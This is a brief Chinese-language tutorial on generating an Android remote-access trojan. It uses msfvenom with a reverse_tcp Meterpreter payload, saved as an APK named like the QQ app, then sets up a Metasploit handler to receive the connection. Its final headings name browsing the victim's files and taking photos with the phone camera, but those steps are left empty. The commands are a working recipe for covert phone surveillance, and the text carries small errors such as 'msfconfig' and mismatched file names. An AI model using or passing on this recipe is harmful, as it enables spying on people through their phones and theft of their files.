一、我們需要的軟件
Kali2.0(系統自帶msfVENOM、metasploit、msfconfig)安卓手機,安卓虛擬機查看自己的IP:172.20.10.8
二、使用msfvenom生成apk木馬
解釋:msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令行,和效率.利用msfvenom生成木馬程序,並在目標機上執行,在本地監聽上線
用到命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=172.20.10.8 LPORT=2323 R > /test/qq1.apk
P 攻擊payload
LHOST = 接收反彈連接主機
LPORT = 接收反彈連接主機的監聽端口
然後是路徑生成路徑
生成pp1.apk木馬,下一步要放到安卓系統中去。
三、啓動metasploit
依次執行輸入msfconfig
use exploit/multi/handler 加載攻擊模塊
set payload android/meterpreter/reverse_tcp 選擇要使用的Payload
四、查看手機中的文件
五、使用相機拍照
